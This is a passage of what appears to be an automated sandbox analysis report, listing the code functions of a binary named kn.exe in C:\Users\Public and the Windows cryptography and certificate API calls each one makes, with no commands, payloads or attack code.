              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCEE94 CryptSignMessage,SetLastError,7_2_00007FF68FCCEE94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC40E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF68FC40E94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC72E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68FC72E7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6EA8 NCryptImportKey,#360,7_2_00007FF68FCD6EA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6E48 NCryptSetProperty,#360,7_2_00007FF68FCD6E48
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF68FCA2E6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF68FCE4E58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC30E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC30E24
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF68FCC8DD0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF68FCA0DD4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF68FCF0DB8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC84DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68FC84DDC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6DE0 NCryptCreatePersistedKey,#360,7_2_00007FF68FCD6DE0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0D84 NCryptFreeObject,#205,#357,7_2_00007FF68FCA0D84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68FCA2D78
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6D78 NCryptOpenKey,#360,7_2_00007FF68FCD6D78
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD2DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF68FCD2DAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF68FCA0D14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC92CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF68FC92CF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF68FCA2CFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6D2C NCryptFreeBuffer,#360,7_2_00007FF68FCD6D2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC62D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FC62D18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC64CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF68FC64CC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF68FCF8CF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6CE0 NCryptEnumStorageProviders,#360,7_2_00007FF68FCD6CE0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6C88 NCryptEnumAlgorithms,#360,7_2_00007FF68FCD6C88
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF68FCA2C80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF68FCE4C80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF68FCAACAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC94CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FC94CA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC06C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF68FC06C4C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF68FCA0C3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68FCD8C58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6C30 NCryptOpenStorageProvider,#360,7_2_00007FF68FCD6C30
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF68FC3CC24
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA2BC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF68FCD0BF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF68FCA0B80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF68FCCCBB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF68FC2CB98
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD0B9C CryptHashData,GetLastError,#357,7_2_00007FF68FCD0B9C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68FD0EB38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC42B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF68FC42B00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC98AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68FC98AFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF68FCA0ABC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF68FCA2AE4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD2A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF68FCD2A78
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC16A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF68FC16A84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68FC8EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA8AA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF68FC8AA00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC84A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF68FC84A34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF68FCA0A18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF68FCA4A1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCDA9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF68FC6E9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD2994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF68FCD2994
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF68FCA099C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC629A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68FC629A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA8940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCAC940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68FC2C960
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD4914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FCD4914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF68FC8E914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF68FC1A8CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA08EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF68FCA08EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68FD0E8B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF68FCA0844
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF68FCD8814
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC26824 CryptHashCertificate,GetLastError,#357,7_2_00007FF68FC26824
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCB07D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC067CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC067CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC927BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC927BC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68FC8C7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA07F4 BCryptDestroyKey,#205,#357,7_2_00007FF68FCA07F4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA07A4 BCryptDestroyHash,#205,#357,7_2_00007FF68FCA07A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF68FCA0740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FCDA740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC92724 CryptDecodeObject,GetLastError,#357,7_2_00007FF68FC92724
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC426E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF68FC426E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD66D8 NCryptFreeObject,#360,7_2_00007FF68FCD66D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF68FCC86D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC74694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF68FC74694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC36694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF68FC36694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6654 NCryptGetProperty,#360,7_2_00007FF68FCD6654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF68FC6A654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC28600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF68FC28600
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC30630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC30630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68FC2C5D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC625E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF68FC625E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68FCDA590
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF68FC9E57C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA65B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF68FCA65B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF68FD0A58C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF68FC2C514
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCCE516
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC724D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF68FC724D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC144E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC144E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC98488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC98488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF68FC7C450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF68FC7A450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC24410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC24410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68FCD8404
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC423E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF68FC423E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF68FC2E3B0
